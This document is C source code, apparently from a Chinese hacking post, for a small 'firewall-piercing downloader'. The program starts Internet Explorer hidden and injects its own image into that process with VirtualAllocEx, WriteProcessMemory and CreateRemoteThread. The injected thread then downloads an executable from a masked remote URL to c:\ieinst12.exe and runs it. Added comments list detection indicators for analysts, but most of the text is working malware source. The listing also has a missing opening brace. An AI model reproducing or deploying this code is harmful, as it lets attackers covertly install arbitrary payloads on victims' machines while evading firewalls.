3k穿墙下载者VC源代码:

/* 
   "mini_downloader" 
   code bykardinal p.s.t 
   compile by vc++ 6.0 
   can not run under win98; 
*/ 
#include <windows.h> 
#pragma comment(lib,"user32.lib") 
#pragma comment(lib,"kernel32.lib") 
//#pragma comment(linker, "/OPT:NOWIN98")   //取消这几行的注释,编译出的文件只有2K大小 
//#pragma comment(linker, "/merge:.data=.text")    
//#pragma comment(linker, "/merge:.rdata=.text")    
//#pragma comment(linker, "/align:0x200") 
#pragma comment(linker, "/ENTRY:main")    
#pragma comment(linker, "/subsystem:windows") 
#pragma comment(linker, "/BASE:0x13150000") 
    
   /* File-scope state used by main() and download(). The two function pointers
      are filled in by download() with GetProcAddress, so shell32.dll and
      urlmon.dll are not linked at build time (only user32.lib and kernel32.lib
      are named in the #pragma comment(lib, ...) lines). */
   HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );// pointer for ShellExecuteA, resolved from shell32.dll at run time 
   DWORD(WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);// pointer for URLDownloadToFileA, resolved from urlmon.dll at run time 
   HANDLE processhandle; // handle returned by OpenProcess() in main()
   DWORD pid; // process id written by GetWindowThreadProcessId() in main()
   HINSTANCE hshell,hurlmon; // module handles returned by LoadLibrary() in download()
/*
 * download - routine that main() starts as a remote thread inside the
 * Internet Explorer process (its address is what main() passes to
 * CreateRemoteThread).
 *
 * Loads shell32.dll and urlmon.dll, resolves ShellExecuteA and
 * URLDownloadToFileA, saves the hard-coded URL to c:\ieinst12.exe, opens
 * that file, then ends the hosting process.
 *
 * Takes no parameters and returns nothing; the thread argument passed by
 * main() is not read here. No return value is checked.
 *
 * Analyst view: because this runs inside the browser process, the HTTP
 * request and the file write are attributed to iexplore.exe. Observable
 * artifacts in this listing are the file c:\ieinst12.exe, urlmon.dll
 * download activity followed by a ShellExecuteA "open" of the same path,
 * and the browser process exiting straight afterwards.
 *
 * NOTE(review): as published, the line after the signature is blank where
 * the opening brace of the body would be.
 */
void download() // download routine that is run by the injected thread 

   hshell=LoadLibrary("Shell32.dll"); 
   hurlmon=LoadLibrary("urlmon.dll"); 
   // Resolve both APIs by name at run time and store them in the file-scope pointers.
   (FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA"); 
   (FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA"); 
   // Save the remote file under a fixed name in the root of drive C.
   DOWNFILE(NULL,"http://www.xxxxxxx.cn/en/notepad.exe","c:\\ieinst12.exe",0, NULL); 
   // "open" verb on the saved file; 5 is the show-command value SW_SHOW.
   SHELLRUN(0,"open","c:\\ieinst12.exe",NULL,NULL,5); 
   // Ends the process this code is running in (the IE instance when started from main()).
   ExitProcess(0); 
}; 
    
/*
 * main - program entry point (set with /ENTRY:main in the linker pragmas).
 *
 * Sequence, as written:
 *   1. Builds "<drive>:\program files\Internet Explorer\IEXPLORE.EXE" from
 *      the first three characters of the Windows directory and starts it
 *      with a hidden window.
 *   2. After a fixed 500 ms wait, looks up a window of class "IEFrame" and
 *      opens its owning process with PROCESS_ALL_ACCESS.
 *   3. Reads this image's size from its own PE header and asks for memory
 *      of that size in the IE process at the same address as this image.
 *   4. Copies the whole image into that memory and creates a remote thread
 *      whose start address is download().
 *   5. Closes the process handle and returns.
 *
 * No return value is checked at any step.
 *
 * Analyst view: the API chain OpenProcess(PROCESS_ALL_ACCESS) ->
 * VirtualAllocEx(PAGE_EXECUTE_READWRITE) -> WriteProcessMemory ->
 * CreateRemoteThread against another process is the behaviour to alert on,
 * together with iexplore.exe being started hidden by a non-browser parent
 * and a thread in iexplore.exe starting in memory not backed by a module on
 * disk. The non-default /BASE:0x13150000 in the linker pragmas matches the
 * requested allocation address (the module handle); presumably chosen so
 * the copied image needs no relocation -- TODO confirm.
 */
void main() // main function 
{    
    // 1. Build the IE path and run it 
   char iename[MAX_PATH],iepath[MAX_PATH]; 
   ZeroMemory(iename,sizeof(iename)); 
   ZeroMemory(iepath,sizeof(iepath)); 
   GetWindowsDirectory(iepath,MAX_PATH); 
   // Copies only the first three characters (e.g. "C:\"); iename was zeroed above, so it stays terminated.
   strncpy(iename,iepath,3); 
   strcat(iename,"program files\\Internet Explorer\\IEXPLORE.EXE"); 
   //strcat(iename,"windows\\notepad.EXE"); 
   // SW_HIDE: the browser is started without a visible window.
   WinExec(iename,SW_HIDE); 
   // Fixed delay before the window lookup below.
   Sleep(500); 
   // 2. Get the IE process handle 
   HWND htemp; 
   // Matches by window class only, so any IEFrame window can be returned, not
   // necessarily the instance started above.
   htemp=FindWindow("IEFrame",NULL); 
   GetWindowThreadProcessId(htemp,&pid); 
   processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); 
    
   // 3. Allocate memory 
   HMODULE Module; 
   LPVOID NewModule; 
   DWORD Size; 
   LPDWORD lpimagesize; 
   Module = GetModuleHandle(NULL);// base address of this process's own image 
   // Get the size of the in-memory image.
   // The assembly reads the DWORD at Module+0x3c (offset of the PE header in
   // the DOS header), then the DWORD 0x50 bytes into the PE header, which is
   // the SizeOfImage field for a 32-bit image, and stores it in lpimagesize.
   _asm 
   { 
       push eax; 
       push ebx; 
       mov ebx,Module; 
       mov eax,[ebx+0x3c]; 
       lea eax,[ebx+eax+0x50];     
       mov eax,[eax] 
       mov lpimagesize,eax; 
       pop ebx; 
       pop eax; 
   }; 
   // lpimagesize holds the size value itself, not a pointer; it is cast back to DWORD here.
   Size=(DWORD)lpimagesize; 
   NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);// requests the region at the same address as this image's base, readable/writable/executable 
   // 4. Write memory, create thread 
   WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);// copies Size bytes of this image into the IE process 
   LPTHREAD_START_ROUTINE entrypoint; 
   // Stores the address of download() in entrypoint.
   __asm 
   { 
       push eax; 
       lea eax,download; 
       mov entrypoint,eax; 
       pop eax 
   } 
CreateRemoteThread(processhandle, NULL, 0, entrypoint, Module, 0, NULL);    // creates the thread in the IE process; it starts running at download() 
    
   // 5. Close the handle 
   CloseHandle(processhandle); 
   return; 
} ;
